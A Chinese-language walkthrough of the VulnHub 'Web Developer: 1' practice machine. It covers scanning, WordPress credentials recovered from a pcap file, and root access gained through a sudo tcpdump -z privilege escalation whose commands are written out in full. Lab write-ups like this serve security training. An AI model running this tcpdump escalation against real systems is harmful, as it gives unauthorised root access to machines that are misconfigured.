vulnhub-Web Developer 1靶机

vulnhub:Web Developer: 1 ~ VulnHub

导入靶机,放在kali同网段,扫描

靶机在192.168.114.129,扫描端口

有网站服务,访问

没什么东西,扫目录

真不少,访问一下,也只是一些普通的Wordpress的页面,换个字典再扫一次

这次多出来一个ipdata目录

里面有个cap文件,下载

在里面找到了账号密码

webdeveloper:Te5eQg&4sBS!Yr$)wf%(DcAd

登录wordpress

靶机似乎有点问题,我这里跳过获取Wordpress的shell,请自行参考别的wp

webdeveloper:MasterOfTheUniverse

登录

根据sudo -l,我们可以运行tcpdump

查看提权网站的使用方式

COMMAND='ls -al /root'

TF=$(mktemp)

echo "$COMMAND" > $TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

执行完成后,再开一个终端,执行命令

nc -v -z -n -w 1 127.0.0.1 1

可以看到原来的终端执行了ls -al /root命令,所以我们只需要替换命令就可以查看flag

COMMAND='cat /root/flag.txt'

TF=$(mktemp)

echo "$COMMAND" > $TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

相关推荐
留白的云4 天前
Android app反编译 攻与防
android·安全性测试
柴郡猫^O^6 天前
OSCP - Proving Grounds - Sorcerer
安全·网络安全·安全性测试
柴郡猫^O^9 天前
OSCP - Proving Grounds - DC-4
安全·网络安全·安全性测试
Linux运维老纪23 天前
网络安全之渗透测试(Penetration Testing for Network Security)
安全·网络安全·云计算·运维开发·devops·安全性测试
H_kiwi1 个月前
APT 参与者将恶意软件嵌入 macOS Flutter 应用程序中
java·python·安全·flutter·macos·安全威胁分析·安全性测试
测试小小怪下士1 个月前
单元测试、集成测试、系统测试、验收测试、压力测试、性能测试、安全性测试、兼容性测试、回归测试(超详细的分类介绍及教学)
功能测试·单元测试·测试用例·集成测试·压力测试·模块测试·安全性测试
云起无垠1 个月前
【论文速读】| F2A:一种利用伪装安全检测智能体进行提示注入的创新方法
安全·语言模型·安全性测试
ξ流ぁ星ぷ1322 个月前
小林渗透入门:burpsuite+proxifier抓取小程序流量
安全·web安全·网络安全·小程序·安全性测试
英英-2 个月前
安全性测试
安全性测试
Elastic 中国社区官方博客2 个月前
使用 NLP 和模式匹配检测、评估和编辑日志中的个人身份信息 - 第 1 部分
大数据·人工智能·elasticsearch·搜索引擎·ai·自然语言处理·安全性测试